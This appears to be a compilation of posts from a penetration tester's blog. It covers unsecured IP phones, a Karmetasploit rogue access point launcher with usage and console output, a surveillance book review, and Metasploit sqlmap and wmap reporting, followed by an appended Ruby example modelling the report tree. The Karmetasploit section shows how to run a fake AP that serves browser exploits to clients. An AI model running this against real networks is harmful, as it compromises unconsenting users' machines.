Secure Your IP Phones


I have been traveling and immersed in several projects for the last couple of weeks, and at all clients I saw IP phones, and I can say that at all clients they were not secured. In fact, as you can see in the attached picture, I had all the info by just pressing some buttons. I have always given this advice to my clients, but it tends to fall on deaf ears. In fact, when asking, almost all the guys I know who administer VoIP infrastructures do not even encrypt the RTP stream!! And many have phones in lobbies and conference rooms and exposed jacks that only use CDP as a means to access the VoIP VLAN. voiphopper anyone?

Karmetasploit Script Updated

/kmsapng.tgz

The script will do the following:
- Change the MAC address of the interface
- Set the Interface in Monitor Mode
- Start the Karma AP with Airbase-ng
- Change the MTU Size for the interface
- Set the IP
- Start the DHCPD server
- Set in iptables a redirect of all traffic to itself so as to bypass cached DNS entries
- Start Metasploit.

The script will create a log file in /root called karma.log, as well as a sqlite db and a capture file, all in the same folder.

Here is a preview of the script and its options. I posted this same entry in the remote-exploit forums and the Pauldotcom forums and have received very good feedback on it.

bt ~ # ./kmsapng.sh -h
Karmetasploit AP launcher by Carlos Perez for Backtrack3
Version 0.2
carlos_perez[at]darkoperator.com
usage: kmsap.sh

Options:
-m : Mode, either km for regular karmetasploit attack
or kmf for filtered attack where only targeted
clients can associate to the fake AP.
-i : Interface supported by aircrack-ng for injection
-f : Text file with mac addresses of client computers
permited to connect to the fake AP.
-s : SSID name used as the initial broadcast
-h : This help message

Note: mode and interface are required for both type of attacks

Example:

bt ~ # ./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ..............
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit

(Metasploit ASCII-art banner)

=[ msf v3.2-testing
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 10.0.0.1

......................................

I have tested the script using Ralink 2570, Realtek 8187L and Atheros cards. Let me know if you guys like it and if you have any recommendations. The script is heavily commented in case you want to take a look.

Book: The Shadow Factory The Ultra-Secret NSA from 9/11 to the Eavesdropping on America

I just finished reading this book, and I do have to say that it has brought up my paranoia level several fold. The powers of the NSA, how with the current legislation this agency has the power to spy on anybody in the world, and the ease with which companies are cooperating to help with the data collection are really frightening. I highly recommend this book; it was a very enlightening read. From now on I'm going to be more aware and encrypt even more of my traffic. I highly recommend the use of OTR for instant messaging (part of Adium on the Mac and a plugin for Pidgin) and GnuPG for email. If you have the money I highly recommend PGP; I know some of the folks there and I can tell you that they are top cryptologists and are very dedicated to providing the best encryption for their customers.

SQLMap Metasploit Module

With the latest version of sqlmap, they contributed to Metasploit a module for running their tool directly from the Framework. I really find this interesting since it shows how the framework can leverage other tools to expand its capabilities, showing even more flexibility. To use the module one only has to type in the msfconsole "use auxiliary/scanner/http/wmap_sqlmap" and from there type "show options", select what options to set, and set them.

Basic Reporting in Metasploit wmap

Well, today I was pleasantly surprised when I did an SVN update and saw several changes to wmap; when reading the documentation I was even more surprised to see that basic reporting was added!!! Now this is something that I have always found lacking in MSF, and seeing it in wmap really makes me happy. I do hope that the project keeps improving like it has been so far.
Information from the documentation:

Each module is capable of storing reporting information.
Reporting key concepts:

+ Reporting is used to gather and store data
+ Bye bye to useless risk levels
+ Data is not only findings (i.e. vulnerabilities) but also any relevant data (i.e. database name from a SQL injection)
+ Data is available to other modules, so reporting becomes a method to share information
+ Data has context and that context is preserved.
+ Context is preserved by having a tree structure in the Report database table
+ Every report entry has a parent_id; the top parent_id is 0 and is only used to create a report entry (this allows for the storage of multiple reports)
+ The report table is basically a type,name,value database.
+ This schema allows the storage of data/vulnerabilities with any classification/naming convention. (very useful to store vulnerabilities discovered in year 2060).

So how it works:

When a module is executed (using WMAP 'wmap_run -e' or standalone):

WMAP creates a new report entry, then in each module when something is found or
something needs to be reported the module should implement the following lines:

Example:

if vulnerability_found
  print_status("FOUND BLAH BLAH BLAH")

  # Obtain the latest report id for host, port, ssl (the target)
  rep_id = wmap_base_report_id(
    self.target_host,
    self.target_port,
    self.ssl
  )

  # Report the finding. wmap_report() returns the id of this new entry,
  # which is then used as the parent of the details stored below.
  vuln_id = wmap_report(rep_id, 'VULNERABILITY', 'SQL_INJECTION', url_path,
    "A SQL injection vulnerability was found in the following URL in the parameter 'test'")

  # Let's say we also need to store the parameter vulnerable to the
  # injection and the type of injection: they hang off the vulnerability entry.
  wmap_report(vuln_id, 'SQL_INJECTION', 'PARAMETER', parameter, "Notes blah blah")
  wmap_report(vuln_id, 'SQL_INJECTION', 'TYPE', 'String', "Notes 2 blah blah")
end


If you are connected to a database (db_connect) then reporting is active and every module executed will
store its results for reporting. Even if you define a RHOSTS range then the results auto-magically will
be organized per host,port as wmap_base_report_id() returns the last available report for the specified
host,port,ssl target.

Anything can be represented and reported and other modules will have access to this information to do
whatever they want.

To view available reports use the 'wmap_reports' command:

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > load db_wmap
[*] =[ WMAP v0.2 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_connect
[*] Successfully connected to the database
[*] File: /Users/et/.msf3/sqlite3.db
...
msf > wmap_reports -p
[*] Id. Created Target (host,port,ssl)
1. Wed Oct 22 23:22:16 -0500 2008 XX.XXX.XXX.XXX,80,0
[*] Done.
msf > wmap_reports -s 1
WMAP REPORT: XX.XXX.XXX.XXX,80,0 Metasploit WMAP Report [Wed Oct 22 23:22:16 -0500 2008]
WEB_SERVER TYPE: Apache [Wed Oct 22 23:22:16 -0500 2008]
VULNERABILITY SQL_INJECTION: /test.asp SQL injection found. [Wed Oct 22 23:22:31 -0500 2008]
SQL_INJECTION PARAMETER: id [Wed Oct 22 23:22:31 -0500 2008]
SQL_INJECTION TYPE: String [Wed Oct 22 23:22:31 -0500 2008]
[*] Done.
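To make the tree structure behind the module snippet and the 'wmap_reports -s' output above concrete, here is an added example in plain Ruby (not Metasploit's or wmap's own code): an in-memory model of the type,name,value report table with parent_id links, a wmap_base_report_id() that returns the latest top-level report for a host,port,ssl target, a wmap_report() that returns the id of the row it stores, and a renderer that prints the tree in the style of the listing above. The class name, wmap_new_report, render and demo_store are assumptions of this example; the sample data and timestamps are constructed to match the report shown in the text.

```ruby
# Added example, not Metasploit's or wmap's own code: an in-memory model
# of the WMAP report table described above. Rows are (id, parent_id,
# type, name, value, notes, created); parent_id 0 marks a top-level
# report for one target, and all other rows hang off a parent row.
class WmapReportStore
  Entry = Struct.new(:id, :parent_id, :type, :name, :value, :notes, :created)

  def initialize
    @entries = []
  end

  # Store one row under parent_id and return the new row's id
  # (same contract as wmap_report() in the text).
  def wmap_report(parent_id, type, name, value, notes = '', created = Time.now)
    entry = Entry.new(@entries.size + 1, parent_id, type, name, value, notes, created)
    @entries << entry
    entry.id
  end

  # What WMAP does when a module runs: open a new top-level report
  # (parent_id 0) whose value is the "host,port,ssl" target string.
  # (Name is an assumption of this example.)
  def wmap_new_report(host, port, ssl, created = Time.now)
    wmap_report(0, 'WMAP', 'REPORT', target_key(host, port, ssl),
                'Metasploit WMAP Report', created)
  end

  # Id of the latest top-level report for host,port,ssl, or nil if the
  # target has no report yet (mirrors wmap_base_report_id() in the text).
  def wmap_base_report_id(host, port, ssl)
    key = target_key(host, port, ssl)
    last = @entries.select { |e| e.parent_id == 0 && e.value == key }.max_by(&:id)
    last && last.id
  end

  # Lines in the style of 'wmap_reports -s <id>': the root first, then
  # every descendant depth-first, indented by its depth below the root.
  def render(report_id)
    root = @entries.find { |e| e.id == report_id && e.parent_id == 0 }
    return [] unless root
    lines = ["WMAP REPORT: #{root.value} #{root.notes} [#{stamp(root.created)}]"]
    walk(report_id, 1) do |e, depth|
      fields = [e.type, "#{e.name}:", e.value, e.notes].reject(&:empty?)
      lines << ('  ' * (depth - 1)) + fields.join(' ') + " [#{stamp(e.created)}]"
    end
    lines
  end

  private

  def target_key(host, port, ssl)
    "#{host},#{port},#{ssl ? 1 : 0}"
  end

  # Same timestamp layout as the listing in the text.
  def stamp(t)
    t.strftime('%a %b %d %H:%M:%S %z %Y')
  end

  def walk(parent_id, depth, &blk)
    @entries.select { |e| e.parent_id == parent_id }.each do |e|
      blk.call(e, depth)
      walk(e.id, depth + 1, &blk)
    end
  end
end

# Constructed sample data reproducing the report shown in the text (fixed
# timestamps so the output is deterministic), plus a second target to show
# that findings are organized per host,port,ssl.
def demo_store
  store = WmapReportStore.new
  t0 = Time.new(2008, 10, 22, 23, 22, 16, '-05:00')
  t1 = Time.new(2008, 10, 22, 23, 22, 31, '-05:00')

  store.wmap_new_report('XX.XXX.XXX.XXX', 80, false, t0)
  rep_id = store.wmap_base_report_id('XX.XXX.XXX.XXX', 80, false)
  store.wmap_report(rep_id, 'WEB_SERVER', 'TYPE', 'Apache', '', t0)
  vuln_id = store.wmap_report(rep_id, 'VULNERABILITY', 'SQL_INJECTION',
                              '/test.asp', 'SQL injection found.', t1)
  store.wmap_report(vuln_id, 'SQL_INJECTION', 'PARAMETER', 'id', '', t1)
  store.wmap_report(vuln_id, 'SQL_INJECTION', 'TYPE', 'String', '', t1)

  # A second target gets its own top-level report; a module run against it
  # would attach its findings there, not to the first host's report.
  store.wmap_new_report('10.0.0.5', 443, true, t1)
  store
end

if __FILE__ == $0
  puts demo_store.render(1)
end
```

Running the file prints the five-line report for the first target; render() on a non-root id returns an empty list, and wmap_base_report_id() returns nil for a target that has never been reported on, which is the case a module has to handle before calling wmap_report().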